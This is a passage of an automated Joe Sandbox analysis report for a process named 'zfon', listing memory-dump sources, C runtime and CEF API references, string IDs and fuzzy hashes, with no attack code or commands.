                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freemallocmemcpymemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3118627126-0
                                                                                                                                                                            • Opcode ID: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                                                                                            • Instruction ID: 9062175cefbc0d68da3ea64880448d6502d3c4c61cfc91ede7445ff9c1ffdb7c
                                                                                                                                                                            • Opcode Fuzzy Hash: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                                                                                            • Instruction Fuzzy Hash: BA71D427B4965684FE24AB7298043BCA776FB08BA4F985636CE6D177C4DF38E449C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            • Opcode ID: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                                                                                            • Instruction ID: 768743f927bbbf9ce4c61cf7889b5eace4872a2a237ce58cf3124a788efbf1e9
                                                                                                                                                                            • Opcode Fuzzy Hash: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                                                                                            • Instruction Fuzzy Hash: B351C163B48A4689FF20EF75E4503ACA3B2AB44BE4F844936DE1D17B98EE3CD4458310
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2024851785-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$AdjustPointermemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 338301193-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3154343008-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            • API String ID: 211107550-393685449
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$free$mallocmemcpymemmove
                                                                                                                                                                            • String ID: c
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_allocmemset
                                                                                                                                                                            • String ID: www.battle.net
                                                                                                                                                                            APIs
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B55C89
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374B8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374C9
                                                                                                                                                                              • Part of subcall function 00007FFBC1B374A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B374E5
                                                                                                                                                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B55D10
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55D4F
                                                                                                                                                                            • _Maklocstr.LIBCPMT ref: 00007FFBC1B55D69
                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFBC1B55E3A
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFBC1B66419
                                                                                                                                                                              • Part of subcall function 00007FFBC1B66410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FFBC1B7CAF9,?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B6642A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID: ,$false$true
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initstd::ios_base::_$AddstdExceptionThrowsetvbufstd::ios_base::failure::failurestd::locale::_
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 1099746521-1866435925
                                                                                                                                                                            • Opcode ID: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                                                                                            • Instruction ID: 4f3af5181884865ff261947a1e0553dc6904c5ebe201bbad0309ba6c8fe3f169
                                                                                                                                                                            • Opcode Fuzzy Hash: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6521F1E9A1950B92FF148F20D8111FB1360AF54748FD83035E52E665A5EE2CE626CF50
                                                                                                                                                                            APIs
                                                                                                                                                                            • memcmp.VCRUNTIME140 ref: 00007FF79CFB9F9A
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FC9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FD9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FE9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB9FF6
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA099
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA0A9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA0B9
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFBA0C6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 807481086-0
                                                                                                                                                                            • Opcode ID: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                                                                                            • Instruction ID: 525dcc4972f423c015b419358e0f121497e6c2d751ba4c4f6d95a348e9f3c878
                                                                                                                                                                            • Opcode Fuzzy Hash: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                                                                                            • Instruction Fuzzy Hash: C4617D33A0CA4755FE34AB25E4483B9A6B2EB85BA0FC40535DA9D037D5DF7CE5858320
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24CB
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: memcpy.VCRUNTIME140(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24E2
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24FA
                                                                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBB6F
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBB8C
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBBAF
                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBBE9
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBBFF
                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBC2C
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBC46
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF79CFBBC60
                                                                                                                                                                            • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF79CFBBC7E
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF79CFBBC93
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: memcpy$freememmove$malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4013446061-0
                                                                                                                                                                            • Opcode ID: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                                                                                            • Instruction ID: 0d2b195c391df67fbc81a8cba0b79c1b845212a9a731ac44ed48863c94c10074
                                                                                                                                                                            • Opcode Fuzzy Hash: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                                                                                            • Instruction Fuzzy Hash: 92519666709B8641DE21EB26E94436AE7A1FB45BD4F944235EE9E07B99EF3CD0408310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                                                                                            • Instruction ID: b984b9f16a7d4668a9c660f5b70405841621e6bb32d1f368aea0f62e97138423
                                                                                                                                                                            • Opcode Fuzzy Hash: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A71C4BA608E0682EF14CF24C45037AA760FB84F85F446135DA0E637A4DF3DD855CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                                                                                            • Instruction ID: 4692843a78d2aca73b0a01c75547097f290411f2e1ef989e6c7c14c771e2c6c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                                                                                            • Instruction Fuzzy Hash: 897190BAA08E0681EB14CF25D49037A67A0FB84F85F456136DA1E637A4DF3CE841CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                                                                                            • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                                                                                            • API String ID: 1852475696-928371585
                                                                                                                                                                            • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                                                                                            • Instruction ID: 8e2567c36a2bae1a356843c50b78a3089a4610a57e919301aee61fdac8d899b6
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                                                                                            • Instruction Fuzzy Hash: AC5180AAB19A4792DB24CF34E4913BB6360FF44B84F51A431DE4D53669EEBCE506CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
